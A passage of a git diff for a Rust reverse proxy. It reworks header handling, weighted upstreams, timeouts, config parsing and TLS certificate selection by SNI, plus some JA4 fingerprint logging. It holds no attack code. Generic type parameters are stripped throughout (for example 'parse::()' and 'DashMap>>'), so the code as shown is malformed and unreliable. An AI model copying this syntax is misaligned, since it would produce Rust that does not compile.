AtomicUsize::new(0))); + info!( + "Internal path {} -> {} backend(s)", + path, + config.internal_paths.get(path).unwrap().0.len() + ); } } @@ -162,29 +269,90 @@ async fn populate_file_upstreams(config: &mut Configuration, parsed: &Config) { for (hostname, host_config) in upstreams { // Store certificate mapping if specified if let Some(certificate_name) = &host_config.certificate { - config.certificates.insert(hostname.clone(), certificate_name.clone()); - info!("Upstream {} will use certificate: {}", hostname, certificate_name); + config + .certificates + .insert(hostname.clone(), certificate_name.clone()); + info!( + "Upstream {} will use certificate: {}", + hostname, certificate_name + ); } let path_map = DashMap::new(); - let header_list = DashMap::new(); + let header_list = DashMap::new(); // Legacy: kept for backward compatibility + let request_header_list = DashMap::new(); + let response_header_list = DashMap::new(); for (path, path_config) in &host_config.paths { if let Some(rate) = &path_config.rate_limit { - info!("Applied Rate Limit for {} : {} request per second", hostname, rate); + info!( + "Applied Rate Limit for {} : {} request per second", + hostname, rate + ); } - let mut hl: Vec<(String, String)> = Vec::new(); - build_headers(&path_config.headers, config, &mut hl); - header_list.insert(path.clone(), hl); + // Parse request headers + // Note: request_headers has alias "headers" for backward compatibility + let mut request_hl: Vec<(String, String)> = Vec::new(); + if let Some(headers) = &path_config.request_headers { + for header in headers { + if let Some((key, val)) = header.split_once(':') { + request_hl.push((key.trim().to_string(), val.trim().to_string())); + } + } + } + + // Parse response headers + let mut response_hl: Vec<(String, String)> = Vec::new(); + if let Some(headers) = &path_config.response_headers { + for header in headers { + if let Some((key, val)) = header.split_once(':') { + response_hl.push((key.trim().to_string(), val.trim().to_string())); + } + } + } + + // Backward compatibility: if old "headers" field was used (via alias to request_headers), + // and no explicit response_headers, apply to both request and response + let legacy_headers_used = !request_hl.is_empty() + && response_hl.is_empty() + && path_config.response_headers.is_none(); + if legacy_headers_used { + // Legacy "headers" field was used, apply to response too for backward compatibility + response_hl = request_hl.clone(); + } + + // Store headers + if !request_hl.is_empty() { + request_header_list.insert(path.clone(), request_hl.clone()); + } + if !response_hl.is_empty() { + response_header_list.insert(path.clone(), response_hl.clone()); + } + + // Legacy: keep old header_list for backward compatibility (combines both) + let mut hl: Vec<(String, String)> = request_hl.clone(); + hl.extend(response_hl.clone()); + if !hl.is_empty() { + header_list.insert(path.clone(), hl); + } let mut server_list = Vec::new(); - for server in &path_config.servers { - if let Some((ip, port_str)) = server.split_once(':') { + for server_config in &path_config.servers { + let (server_addr, weight) = match server_config { + crate::utils::structs::ServerConfig::String(addr) => (addr.clone(), 1), + crate::utils::structs::ServerConfig::Object { address, weight } => { + (address.clone(), *weight) + } + }; + + if let Some((ip, port_str)) = server_addr.split_once(':') { if let Ok(port) = port_str.parse::() { - let https_proxy_enabled = path_config.https_proxy_enabled.unwrap_or(false); + let https_proxy_enabled = + path_config.https_proxy_enabled.unwrap_or(false); let ssl_enabled = path_config.ssl_enabled.unwrap_or(true); // Default to SSL let http2_enabled = path_config.http2_enabled.unwrap_or(false); // Default to HTTP/1.1 - let disable_access_log = path_config.disable_access_log.unwrap_or(false); + let disable_access_log = + path_config.disable_access_log.unwrap_or(false); server_list.push(InnerMap { address: ip.trim().to_string(), port, @@ -194,13 +362,24 @@ async fn populate_file_upstreams(config: &mut Configuration, parsed: &Config) { rate_limit: path_config.rate_limit, healthcheck: path_config.healthcheck, disable_access_log, + connection_timeout: path_config.connection_timeout, + read_timeout: path_config.read_timeout, + write_timeout: path_config.write_timeout, + idle_timeout: path_config.idle_timeout, + weight, }); } } } path_map.insert(path.clone(), (server_list, AtomicUsize::new(0))); } - config.headers.insert(hostname.clone(), header_list); + config.headers.insert(hostname.clone(), header_list); // Legacy: kept for backward compatibility + config + .request_headers + .insert(hostname.clone(), request_header_list); + config + .response_headers + .insert(hostname.clone(), response_header_list); imtdashmap.insert(hostname.clone(), path_map); } @@ -221,21 +400,38 @@ pub fn parce_main_config(path: &str) -> AppConfig { } pub fn parce_main_config_with_log_level(path: &str, log_level: Option<&str>) -> AppConfig { - let data = fs::read_to_string(path).unwrap(); + let data = fs::read_to_string(path).unwrap_or_else(|e| { + panic!("Failed to read main config file '{}': {}", path, e); + }); - if let Ok(new_config) = serde_yaml::from_str::(&data) { + let mut unused = Vec::new(); + let deserializer = serde_yaml::Deserializer::from_str(&data); + if let Ok(new_config) = + serde_ignored::deserialize::<_, _, crate::core::cli::Config>(deserializer, |path| { + unused.push(path.to_string()) + }) + { + if !unused.is_empty() { + warn!("Unused config options in {}: {}", path, unused.join(", ")); + } log_builder(log_level); - return new_config.pingora.to_app_config(); + return new_config.proxy.to_app_config(); } - let mut cfo: AppConfig = serde_yaml::from_str(&*data).expect("Failed to parse main config file"); + let mut unused = Vec::new(); + let deserializer = serde_yaml::Deserializer::from_str(&data); + let mut cfo: AppConfig = + serde_ignored::deserialize(deserializer, |path| unused.push(path.to_string())) + .unwrap_or_else(|e| panic!("Failed to parse main config file '{}': {}", path, e)); + if !unused.is_empty() { + warn!( + "Unused legacy config options in {}: {}", + path, + unused.join(", ") + ); + } log_builder(log_level); cfo.healthcheck_method = cfo.healthcheck_method.to_uppercase(); - if let Some((ip, port_str)) = cfo.config_address.split_once(':') { - if let Ok(port) = port_str.parse::() { - cfo.local_server = Option::from((ip.to_string(), port)); - } - } if let Some(tlsport_cfg) = cfo.proxy_address_tls.clone() { if let Some((_, port_str)) = tlsport_cfg.split_once(':') { if let Ok(port) = port_str.parse::() { @@ -298,19 +494,20 @@ fn log_builder(log_level: Option<&str>) { let _ = env_logger::builder().try_init(); } -pub fn build_headers(path_config: &Option>, config: &Configuration, hl: &mut Vec<(String, String)>) { +pub fn build_headers( + path_config: &Option>, + _config: &Configuration, + hl: &mut Vec<(String, String)>, +) { if let Some(headers) = &path_config { for header in headers { if let Some((key, val)) = header.split_once(':') { hl.push((key.trim().to_string(), val.trim().to_string())); } } - if let Some(push) = config.headers.get("GLOBAL_HEADERS") { - for k in push.iter() { - for x in k.value() { - hl.push(x.to_owned()); - } - } - } + // Note: Global headers are now applied separately in proxyhttp.rs + // - global_request_headers are applied in upstream_request_filter + // - global_response_headers are applied in response_filter + // No need to merge them here anymore } } diff --git a/src/utils/state.rs b/src/utils/state.rs index 075bfa3..dd39a0a 100644 --- a/src/utils/state.rs +++ b/src/utils/state.rs @@ -6,7 +6,8 @@ pub struct SharedState { pub first_run: bool, } -pub static GLOBAL_STATE: Lazy> = Lazy::new(|| RwLock::new(SharedState { first_run: true })); +pub static GLOBAL_STATE: Lazy> = + Lazy::new(|| RwLock::new(SharedState { first_run: true })); pub fn mark_not_first_run() { let mut state = GLOBAL_STATE.write().unwrap(); diff --git a/src/utils/structs.rs b/src/utils/structs.rs index 5b8d5b7..98e7696 100644 --- a/src/utils/structs.rs +++ b/src/utils/structs.rs @@ -7,6 +7,8 @@ pub type UpstreamsDashMap = DashMap, Atom pub type UpstreamsIdMap = DashMap; pub type Headers = DashMap>>; +pub type RequestHeaders = DashMap>>; +pub type ResponseHeaders = DashMap>>; #[derive(Debug, Default, Clone, Serialize, Deserialize)] pub struct ServiceMapping { @@ -50,7 +52,10 @@ pub struct GlobalConfig { #[serde(default)] pub global_rate_limit: Option, #[serde(default)] - pub global_headers: Option>, + #[serde(alias = "global_headers")] // Support old format for backward compatibility + pub global_request_headers: Option>, + #[serde(default)] + pub global_response_headers: Option>, #[serde(default)] pub healthcheck_interval: Option, #[serde(default)] @@ -66,7 +71,7 @@ pub struct Config { #[serde(default)] pub sticky_sessions: bool, #[serde(default)] - pub arxignis_paths: Option>, + pub internal_paths: Option>, #[serde(default)] pub upstreams: Option>, #[serde(default)] @@ -94,7 +99,7 @@ pub struct HostConfig { #[serde(default)] pub certificate: Option, #[serde(default)] - pub acme: Option, + pub acme: Option, } impl HostConfig { @@ -107,9 +112,30 @@ impl HostConfig { } } +#[derive(Debug, Clone, Serialize, Deserialize)] +#[serde(untagged)] +pub enum ServerConfig { + String(String), + Object { + address: String, + #[serde(default = "default_weight")] + weight: usize, + }, +} + +impl Default for ServerConfig { + fn default() -> Self { + ServerConfig::String(String::new()) + } +} + +fn default_weight() -> usize { + 1 +} + #[derive(Debug, Default, Serialize, Deserialize)] pub struct PathConfig { - pub servers: Vec, + pub servers: Vec, #[serde(default, alias = "force_https")] pub https_proxy_enabled: Option, #[serde(default)] @@ -117,19 +143,34 @@ pub struct PathConfig { #[serde(default)] pub http2_enabled: Option, #[serde(default)] - pub headers: Option>, + #[serde(alias = "headers")] // Support old format for backward compatibility + pub request_headers: Option>, + #[serde(default)] + pub response_headers: Option>, #[serde(default)] pub rate_limit: Option, #[serde(default)] pub healthcheck: Option, #[serde(default)] pub disable_access_log: Option, + #[serde(default)] + pub connection_timeout: Option, + #[serde(default)] + pub read_timeout: Option, + #[serde(default)] + pub write_timeout: Option, + #[serde(default)] + pub idle_timeout: Option, } #[derive(Debug, Default)] pub struct Configuration { - pub arxignis_paths: DashMap, AtomicUsize)>, + pub internal_paths: DashMap, AtomicUsize)>, pub upstreams: UpstreamsDashMap, - pub headers: Headers, + pub headers: Headers, // Legacy: kept for backward compatibility + pub request_headers: RequestHeaders, // Headers to add to upstream requests (per hostname/path) + pub response_headers: ResponseHeaders, // Headers to add to responses (per hostname/path) + pub global_request_headers: Vec<(String, String)>, // Headers to add to upstream requests + pub global_response_headers: Vec<(String, String)>, // Headers to add to responses pub consul: Option, pub kubernetes: Option, pub typecfg: String, @@ -144,17 +185,10 @@ pub struct Configuration { pub struct AppConfig { pub healthcheck_interval: u16, pub healthcheck_method: String, - pub master_key: String, pub upstreams_conf: String, - pub config_address: String, pub proxy_address_http: String, - pub config_api_enabled: bool, - pub config_tls_address: Option, - pub config_tls_certificate: Option, - pub config_tls_key_file: Option, pub proxy_address_tls: Option, pub proxy_port_tls: Option, - pub local_server: Option<(String, u16)>, pub proxy_certificates: Option, pub proxy_tls_grade: Option, pub default_certificate: Option, @@ -175,5 +209,9 @@ pub struct InnerMap { pub rate_limit: Option, pub healthcheck: Option, pub disable_access_log: bool, + pub connection_timeout: Option, + pub read_timeout: Option, + pub write_timeout: Option, + pub idle_timeout: Option, + pub weight: usize, // Weight for load balancing (default: 1 for equal distribution) } - diff --git a/src/utils/tls.rs b/src/utils/tls.rs index 69d86b3..8d14dc9 100644 --- a/src/utils/tls.rs +++ b/src/utils/tls.rs @@ -1,16 +1,19 @@ +use async_trait::async_trait; use dashmap::DashMap; use log::{error, info, warn}; -use pingora_core::tls::ssl::{select_next_proto, AlpnError, NameType, SniError, SslAlert, SslContext, SslFiletype, SslMethod, SslRef, SslVersion}; -use pingora_core::listeners::tls::TlsSettings; +use once_cell::sync::OnceCell; use pingora_core::listeners::TlsAccept; -use rustls_pemfile::{read_one, Item}; +use pingora_core::listeners::tls::TlsSettings; +use pingora_core::tls::ssl::{ + AlpnError, NameType, SniError, SslAlert, SslContext, SslFiletype, SslMethod, SslRef, + SslVersion, select_next_proto, +}; +use rustls_pemfile::{Item, read_one}; use serde::Deserialize; use std::collections::HashSet; use std::fs::File; use std::io::BufReader; use std::sync::Arc; -use once_cell::sync::OnceCell; -use async_trait::async_trait; use x509_parser::extensions::GeneralName; use x509_parser::nom::Err as NomErr; use x509_parser::prelude::*; @@ -62,14 +65,26 @@ impl TlsAccept for Certificates { async fn certificate_callback(&self, ssl: &mut SslRef) { if let Some(server_name) = ssl.servername(NameType::HOST_NAME) { let name_str = server_name.to_string(); - log::info!("TlsAccept::certificate_callback invoked for hostname: {}", name_str); - log::debug!("TlsAccept: upstreams_cert_map has {} entries", self.upstreams_cert_map.len()); - log::debug!("TlsAccept: cert_name_map has {} entries", self.cert_name_map.len()); + log::info!( + "TlsAccept::certificate_callback invoked for hostname: {}", + name_str + ); + log::debug!( + "TlsAccept: upstreams_cert_map has {} entries", + self.upstreams_cert_map.len() + ); + log::debug!( + "TlsAccept: cert_name_map has {} entries", + self.cert_name_map.len() + ); // Find the matching SSL context for this hostname if let Some(ctx) = self.find_ssl_context(&name_str) { // Log which certificate was found (will be logged in find_ssl_context) - log::info!("TlsAccept: Found matching certificate for hostname: {} (see details above)", name_str); + log::info!( + "TlsAccept: Found matching certificate for hostname: {} (see details above)", + name_str + ); // Get the certificate and key from the SSL context // We need to extract them from the context to use with ssl_use_certificate @@ -77,16 +92,26 @@ impl TlsAccept for Certificates { // So we'll use set_ssl_context instead, which should work match ssl.set_ssl_context(&*ctx) { Ok(_) => { - log::info!("TlsAccept: Successfully set SSL context for hostname: {}", name_str); + log::info!( + "TlsAccept: Successfully set SSL context for hostname: {}", + name_str + ); return; } Err(e) => { - log::error!("TlsAccept: Failed to set SSL context for hostname {}: {:?}", name_str, e); + log::error!( + "TlsAccept: Failed to set SSL context for hostname {}: {:?}", + name_str, + e + ); // Fall through to use default certificate } } } else { - log::warn!("TlsAccept: No matching certificate found for hostname: {}, using default", name_str); + log::warn!( + "TlsAccept: No matching certificate found for hostname: {}, using default", + name_str + ); } } else { log::debug!("TlsAccept: No SNI provided, using default certificate"); @@ -100,7 +125,10 @@ impl TlsAccept for Certificates { if let Some(default_ctx) = self.cert_name_map.get(default_cert_name) { let ctx = default_ctx.value(); - log::info!("TlsAccept: Using configured default certificate: {}", default_cert_name); + log::info!( + "TlsAccept: Using configured default certificate: {}", + default_cert_name + ); if let Err(e) = ssl.set_ssl_context(&*ctx) { log::error!("TlsAccept: Failed to set default SSL context: {:?}", e); } else { @@ -108,23 +136,30 @@ impl TlsAccept for Certificates { } } else { // Fallback to first available certificate if default not found - log::warn!("TlsAccept: Default certificate '{}' not found in cert_name_map, using first available", default_cert_name); + log::warn!( + "TlsAccept: Default certificate '{}' not found in cert_name_map, using first available", + default_cert_name + ); if let Some(default_ctx) = self.cert_name_map.iter().next() { let ctx = default_ctx.value(); if let Err(e) = ssl.set_ssl_context(&*ctx) { log::error!("TlsAccept: Failed to set fallback SSL context: {:?}", e); } else { log::debug!("TlsAccept: Using fallback certificate"); - } - } else { - log::error!("TlsAccept: No certificates available!"); + } + } else { + log::error!("TlsAccept: No certificates available!"); } } } } impl Certificates { - pub fn new(configs: &Vec, _grade: &str, default_certificate: Option<&String>) -> Option { + pub fn new( + configs: &Vec, + _grade: &str, + default_certificate: Option<&String>, + ) -> Option { Self::new_with_sni_callback(configs, _grade, default_certificate, None) } @@ -160,14 +195,20 @@ impl Certificates { valid_configs.push(config.clone()); } None => { - warn!("Skipping invalid certificate: cert={}, key={}", &config.cert_path, &config.key_path); + warn!( + "Skipping invalid certificate: cert={}, key={}", + &config.cert_path, &config.key_path + ); // Continue with other certificates instead of failing } } } if cert_infos.is_empty() { - error!("No valid certificates could be loaded from {} certificate configs", configs.len()); + error!( + "No valid certificates could be loaded from {} certificate configs", + configs.len() + ); return None; } @@ -186,11 +227,17 @@ impl Certificates { }); match found { Some(cert) => { - log::info!("Using configured default certificate: {}", default_cert_name); + log::info!( + "Using configured default certificate: {}", + default_cert_name + ); cert } None => { - log::warn!("Configured default certificate '{}' not found, using first valid certificate", default_cert_name); + log::warn!( + "Configured default certificate '{}' not found, using first valid certificate", + default_cert_name + ); &valid_configs[0] } } @@ -211,10 +258,17 @@ impl Certificates { if let Some(cert_info) = cert_infos.get(idx) { let cert_name = file_name.to_string(); cert_name_map.insert(cert_name.clone(), cert_info.ssl_context.clone()); - log::debug!("Mapped certificate name '{}' to SSL context (from path: {})", cert_name, config.cert_path); + log::debug!( + "Mapped certificate name '{}' to SSL context (from path: {})", + cert_name, + config.cert_path + ); } } else { - log::warn!("Failed to extract certificate name from path: {}", config.cert_path); + log::warn!( + "Failed to extract certificate name from path: {}", + config.cert_path + ); } } @@ -232,50 +286,85 @@ impl Certificates { /// Set upstreams certificate mappings (hostname -> certificate_name) /// The certificate_name should match the file stem used in cert_name_map - /// (i.e., normalized and sanitized: remove wildcard prefix, replace . with _) + /// (stored as-is, including dots and wildcards) pub fn set_upstreams_cert_map(&self, mappings: DashMap) { self.upstreams_cert_map.clear(); for entry in mappings.iter() { let hostname = entry.key().clone(); let cert_name = entry.value().clone(); - // Normalize certificate name to match file stem format used in cert_name_map - // Remove wildcard prefix if present, then sanitize (replace . with _) - let normalized_cert_name = cert_name.strip_prefix("*.").unwrap_or(&cert_name); - let sanitized_cert_name = normalized_cert_name.replace('.', "_").replace('*', "_"); - self.upstreams_cert_map.insert(hostname.clone(), sanitized_cert_name.clone()); - log::info!("Mapped hostname '{}' to certificate '{}' (normalized from '{}')", hostname, sanitized_cert_name, cert_name); + // Store certificate name as-is to avoid collisions + self.upstreams_cert_map + .insert(hostname.clone(), cert_name.clone()); + log::info!( + "Mapped hostname '{}' to certificate '{}'", + hostname, + cert_name + ); } - log::info!("Set upstreams certificate mappings: {} entries", self.upstreams_cert_map.len()); + log::info!( + "Set upstreams certificate mappings: {} entries", + self.upstreams_cert_map.len() + ); } fn find_ssl_context(&self, server_name: &str) -> Option { log::debug!("Finding SSL context for server_name: {}", server_name); - log::debug!("upstreams_cert_map entries: {:?}", - self.upstreams_cert_map.iter().map(|e| (e.key().clone(), e.value().clone())).collect::>()); - log::debug!("cert_name_map entries: {:?}", - self.cert_name_map.iter().map(|e| e.key().clone()).collect::>()); + log::debug!( + "upstreams_cert_map entries: {:?}", + self.upstreams_cert_map + .iter() + .map(|e| (e.key().clone(), e.value().clone())) + .collect::>() + ); + log::debug!( + "cert_name_map entries: {:?}", + self.cert_name_map + .iter() + .map(|e| e.key().clone()) + .collect::>() + ); // First, check if there's an upstreams mapping for this hostname if let Some(cert_name) = self.upstreams_cert_map.get(server_name) { let cert_name_str = cert_name.value(); - log::info!("Found upstreams mapping: {} -> {}", server_name, cert_name_str); + log::info!( + "Found upstreams mapping: {} -> {}", + server_name, + cert_name_str + ); if let Some(ctx) = self.cert_name_map.get(cert_name_str) { - log::info!("Using certificate '{}' for hostname '{}' via upstreams mapping", cert_name_str, server_name); + log::info!( + "Using certificate '{}' for hostname '{}' via upstreams mapping", + cert_name_str, + server_name + ); return Some(ctx.clone()); } else { // Certificate specified in upstreams.yaml but doesn't exist - use default instead of searching further - log::warn!("Certificate '{}' specified in upstreams config for hostname '{}' not found in cert_name_map. Available certificates: {:?}. Will use default certificate (NOT searching for wildcards).", - cert_name_str, server_name, - self.cert_name_map.iter().map(|e| e.key().clone()).collect::>()); + log::warn!( + "Certificate '{}' specified in upstreams config for hostname '{}' not found in cert_name_map. Available certificates: {:?}. Will use default certificate (NOT searching for wildcards).", + cert_name_str, + server_name, + self.cert_name_map + .iter() + .map(|e| e.key().clone()) + .collect::>() + ); return None; // Return None to use default certificate - DO NOT continue searching } } else { - log::debug!("No upstreams mapping found for hostname: {}, will search for exact/wildcard matches", server_name); + log::debug!( + "No upstreams mapping found for hostname: {}, will search for exact/wildcard matches", + server_name + ); } // Then, try exact match in name_map (from certificate CN/SAN) if let Some(ctx) = self.name_map.get(server_name) { - log::info!("Found certificate via CN/SAN exact match for: {}", server_name); + log::info!( + "Found certificate via CN/SAN exact match for: {}", + server_name + ); return Some(ctx.clone()); } @@ -283,13 +372,21 @@ impl Certificates { for config in &self.configs { for name in &config.common_names { if name.starts_with("*.") && server_name.ends_with(&name[1..]) { - log::info!("Found certificate via CN wildcard match: {} matches {}", server_name, name); + log::info!( + "Found certificate via CN wildcard match: {} matches {}", + server_name, + name + ); return Some(config.ssl_context.clone()); } } for name in &config.alt_names { if name.starts_with("*.") && server_name.ends_with(&name[1..]) { - log::info!("Found certificate via SAN wildcard match: {} matches {}", server_name, name); + log::info!( + "Found certificate via SAN wildcard match: {} matches {}", + server_name, + name + ); return Some(config.ssl_context.clone()); } } @@ -303,39 +400,88 @@ impl Certificates { // If default certificate exists and is configured, use it as fallback if self.cert_name_map.contains_key(default_cert_name) { - log::info!("No exact or wildcard match found for '{}', will use default certificate '{}'", server_name, default_cert_name); + log::info!( + "No exact or wildcard match found for '{}', will use default certificate '{}'", + server_name, + default_cert_name + ); return None; // Return None to use default certificate } - log::warn!("No matching certificate found for hostname: {}, will use default certificate", server_name); + log::warn!( + "No matching certificate found for hostname: {}, will use default certificate", + server_name + ); None } - pub fn server_name_callback(&self, ssl_ref: &mut SslRef, _ssl_alert: &mut SslAlert) -> Result<(), SniError> { + pub fn server_name_callback( + &self, + ssl_ref: &mut SslRef, + _ssl_alert: &mut SslAlert, + ) -> Result<(), SniError> { let server_name_opt = ssl_ref.servername(NameType::HOST_NAME); - log::info!("TLS server_name_callback invoked: server_name = {:?}", server_name_opt); + log::info!( + "TLS server_name_callback invoked: server_name = {:?}", + server_name_opt + ); if let Some(name) = server_name_opt { let name_str = name.to_string(); - log::info!("SNI callback: Looking up certificate for hostname: {}", name_str); - log::debug!("SNI callback: upstreams_cert_map has {} entries", self.upstreams_cert_map.len()); - log::debug!("SNI callback: cert_name_map has {} entries", self.cert_name_map.len()); + log::info!( + "SNI callback: Looking up certificate for hostname: {}", + name_str + ); + log::debug!( + "SNI callback: upstreams_cert_map has {} entries", + self.upstreams_cert_map.len() + ); + log::debug!( + "SNI callback: cert_name_map has {} entries", + self.cert_name_map.len() + ); match self.find_ssl_context(&name_str) { Some(ctx) => { - log::info!("SNI callback: Found matching certificate for hostname: {}", name_str); - log::info!("SNI callback: Setting SSL context for hostname: {}", name_str); + log::info!( + "SNI callback: Found matching certificate for hostname: {}", + name_str + ); + log::info!( + "SNI callback: Setting SSL context for hostname: {}", + name_str + ); ssl_ref.set_ssl_context(&*ctx).map_err(|e| { - log::error!("SNI callback: Failed to set SSL context for hostname {}: {:?}", name_str, e); + log::error!( + "SNI callback: Failed to set SSL context for hostname {}: {:?}", + name_str, + e + ); SniError::ALERT_FATAL })?; - log::info!("SNI callback: Successfully set SSL context for hostname: {}", name_str); + log::info!( + "SNI callback: Successfully set SSL context for hostname: {}", + name_str + ); } None => { - log::warn!("SNI callback: No matching certificate found for hostname: {}, using default certificate", name_str); - log::debug!("SNI callback: Available upstreams mappings: {:?}", - self.upstreams_cert_map.iter().map(|e| (e.key().clone(), e.value().clone())).collect::>()); - log::debug!("SNI callback: Available certificate names: {:?}", - self.cert_name_map.iter().map(|e| e.key().clone()).collect::>()); + log::warn!( + "SNI callback: No matching certificate found for hostname: {}, using default certificate", + name_str + ); + log::debug!( + "SNI callback: Available upstreams mappings: {:?}", + self.upstreams_cert_map + .iter() + .map(|e| (e.key().clone(), e.value().clone())) + .collect::>() + ); + log::debug!( + "SNI callback: Available certificate names: {:?}", + self.cert_name_map + .iter() + .map(|e| e.key().clone()) + .collect::>() + ); // Don't set a context - let it use the default } } @@ -351,7 +497,9 @@ impl Certificates { if self.name_map.contains_key(hostname) { // Find the certificate info that matches this hostname for config in &self.configs { - if config.common_names.contains(&hostname.to_string()) || config.alt_names.contains(&hostname.to_string()) { + if config.common_names.contains(&hostname.to_string()) + || config.alt_names.contains(&hostname.to_string()) + { return Some(config.cert_path.clone()); } } @@ -383,24 +531,35 @@ fn load_cert_info(cert_path: &str, key_path: &str, _grade: &str) -> Option { - log::error!("Failed to open certificate file: {:?}", e); + log::error!("Failed to open certificate file '{}': {}", cert_path, e); return None; } Ok(file) => { let mut reader = BufReader::new(file); match read_one(&mut reader) { Err(e) => { - log::error!("Failed to decode PEM from certificate file: {:?}", e); + log::error!( + "Failed to decode PEM from certificate file '{}': {}", + cert_path, + e + ); return None; } Ok(leaf) => match leaf { Some(Item::X509Certificate(cert)) => match X509Certificate::from_der(&cert) { Err(NomErr::Error(e)) | Err(NomErr::Failure(e)) => { - log::error!("Failed to parse certificate: {:?}", e); + log::error!( + "Failed to parse certificate from '{}': {:?}", + cert_path, + e + ); return None; } Err(_) => { - log::error!("Unknown error while parsing certificate"); + log::error!( + "Unknown error while parsing certificate from '{}'", + cert_path + ); return None; } Ok((_, x509)) => { @@ -424,7 +583,7 @@ fn load_cert_info(cert_path: &str, key_path: &str, _grade: &str) -> Option { - log::error!("Failed to read certificate"); + log::error!("Failed to read certificate from '{}'", cert_path); return None; } }, @@ -433,23 +592,29 @@ fn load_cert_info(cert_path: &str, key_path: &str, _grade: &str) -> Option { - Some(CertificateInfo { - common_names: common_names.into_iter().collect(), - alt_names: alt_names.into_iter().collect(), - ssl_context, - cert_path: cert_path.to_string(), - key_path: key_path.to_string(), - }) - } + Ok(ssl_context) => Some(CertificateInfo { + common_names: common_names.into_iter().collect(), + alt_names: alt_names.into_iter().collect(), + ssl_context, + cert_path: cert_path.to_string(), + key_path: key_path.to_string(), + }), Err(e) => { - log::error!("Failed to create SSL context from cert paths '{}' and '{}': {}", cert_path, key_path, e); + log::error!( + "Failed to create SSL context from cert paths '{}' and '{}': {}", + cert_path, + key_path, + e + ); None } } } -fn create_ssl_context(cert_path: &str, key_path: &str) -> Result> { +fn create_ssl_context( + cert_path: &str, + key_path: &str, +) -> Result> { // Always try to use global certificates for SNI callback // This ensures that even contexts created without explicit certificates // will have the SNI callback set if global certificates are available @@ -464,8 +629,12 @@ fn create_ssl_context_with_sni_callback( let mut ctx = SslContext::builder(SslMethod::tls()) .map_err(|e| format!("Failed to create SSL context builder: {}", e))?; - ctx.set_certificate_chain_file(cert_path) - .map_err(|e| format!("Failed to set certificate chain file '{}': {}", cert_path, e))?; + ctx.set_certificate_chain_file(cert_path).map_err(|e| { + format!( + "Failed to set certificate chain file '{}': {}", + cert_path, e + ) + })?; ctx.set_private_key_file(key_path, SslFiletype::PEM) .map_err(|e| format!("Failed to set private key file '{}': {}", key_path, e))?; @@ -476,9 +645,11 @@ fn create_ssl_context_with_sni_callback( let certs_for_callback = certificates.or_else(get_global_certificates); if let Some(certs) = certs_for_callback { let certs_clone = certs.clone(); - ctx.set_servername_callback(move |ssl_ref: &mut SslRef, _ssl_alert: &mut SslAlert| -> Result<(), SniError> { - certs_clone.server_name_callback(ssl_ref, _ssl_alert) - }); + ctx.set_servername_callback( + move |ssl_ref: &mut SslRef, _ssl_alert: &mut SslAlert| -> Result<(), SniError> { + certs_clone.server_name_callback(ssl_ref, _ssl_alert) + }, + ); log::debug!("Set SNI callback on SSL context for certificate selection"); } else { // Certificates may not be loaded yet (e.g., during startup before Redis certificates are fetched) @@ -552,8 +723,11 @@ pub fn create_tls_settings_with_sni( log::info!("Creating TlsSettings with callbacks for dynamic certificate selection"); log::info!("Default certificate: {} / {}", cert_path, key_path); - log::info!("Certificate mappings: {} upstreams, {} certificates", - certs.upstreams_cert_map.len(), certs.cert_name_map.len()); + log::info!( + "Certificate mappings: {} upstreams, {} certificates", + certs.upstreams_cert_map.len(), + certs.cert_name_map.len() + ); // Use TlsSettings::with_callbacks() instead of TlsSettings::intermediate() // This allows us to provide our Certificates struct which implements TlsAccept @@ -609,7 +783,7 @@ pub fn set_tsl_grade(tls_settings: &mut TlsSettings, grade: &str) { } /// Extract server certificate information for access logging -pub fn extract_cert_info(cert_path: &str) -> Option { +pub fn extract_cert_info(cert_path: &str) -> Option { use sha2::{Digest, Sha256}; let file = File::open(cert_path).ok()?; @@ -641,7 +815,7 @@ pub fn extract_cert_info(cert_path: &str) -> Option Option, ) -> Option> { - let peer_addr_str = peer_addr.as_ref() + let peer_addr_str = peer_addr + .as_ref() .and_then(|a| a.as_inet()) .map(|inet| format!("{}:{}", inet.ip(), inet.port())) .unwrap_or_else(|| "unknown".to_string()); - debug!("Generating fingerprint from ClientHello: Peer: {}, SNI={:?}, ALPN={:?}, raw_len={}", - peer_addr_str, hello.sni, hello.alpn, hello.raw.len()); + debug!( + "Generating fingerprint from ClientHello: Peer: {}, SNI={:?}, ALPN={:?}, raw_len={}", + peer_addr_str, + hello.sni, + hello.alpn, + hello.raw.len() + ); // Generate JA4 fingerprint from raw ClientHello bytes - if let Some(mut fingerprint) = crate::utils::tls_fingerprint::fingerprint_client_hello(&hello.raw) { + if let Some(mut fingerprint) = + crate::utils::tls_fingerprint::fingerprint_client_hello(&hello.raw) + { // Always prefer SNI and ALPN from Pingora's parsed ClientHello if available // Pingora's parsing is more reliable than raw bytes parsing if hello.sni.is_some() { @@ -94,7 +102,11 @@ pub fn generate_fingerprint_from_client_hello( return Some(fingerprint_arc); } - debug!("Failed to generate fingerprint from ClientHello: Peer: {}, raw_len={}", peer_addr_str, hello.raw.len()); + debug!( + "Failed to generate fingerprint from ClientHello: Peer: {}, raw_len={}", + peer_addr_str, + hello.raw.len() + ); None } @@ -142,7 +154,10 @@ pub fn get_fingerprint(peer_addr: &SocketAddr) -> Option> { pub fn get_fingerprint_with_fallback(peer_addr: &SocketAddr) -> Option> { // First try the exact address match if let Some(fp) = get_fingerprint(peer_addr) { - debug!("Found TLS fingerprint with exact address match: {}", peer_addr); + debug!( + "Found TLS fingerprint with exact address match: {}", + peer_addr + ); return Some(fp); } @@ -163,22 +178,34 @@ pub fn get_fingerprint_with_fallback(peer_addr: &SocketAddr) -> Option { - debug!("No TLS fingerprint found for IP {} (exact match failed, no IP matches)", peer_ip); + debug!( + "No TLS fingerprint found for IP {} (exact match failed, no IP matches)", + peer_ip + ); } 1 => { let (matched_addr, entry) = &matching_entries[0]; - debug!("Found TLS fingerprint with matching IP but different port: {} -> {} (fallback lookup)", peer_addr, matched_addr); + debug!( + "Found TLS fingerprint with matching IP but different port: {} -> {} (fallback lookup)", + peer_addr, matched_addr + ); return Some(entry.fingerprint.clone()); } _ => { // Multiple matches - use the most recent one (most likely to be the correct connection) // This handles cases where PROXY protocol causes address mismatches - let (matched_addr, entry) = matching_entries.iter() + let (matched_addr, entry) = matching_entries + .iter() .max_by_key(|(_, e)| e.stored_at) .unwrap(); - warn!("Multiple TLS fingerprints found for IP {} ({} matches), using most recent from {} (stored at {:?})", - peer_ip, matching_entries.len(), matched_addr, entry.stored_at); + warn!( + "Multiple TLS fingerprints found for IP {} ({} matches), using most recent from {} (stored at {:?})", + peer_ip, + matching_entries.len(), + matched_addr, + entry.stored_at + ); return Some(entry.fingerprint.clone()); } 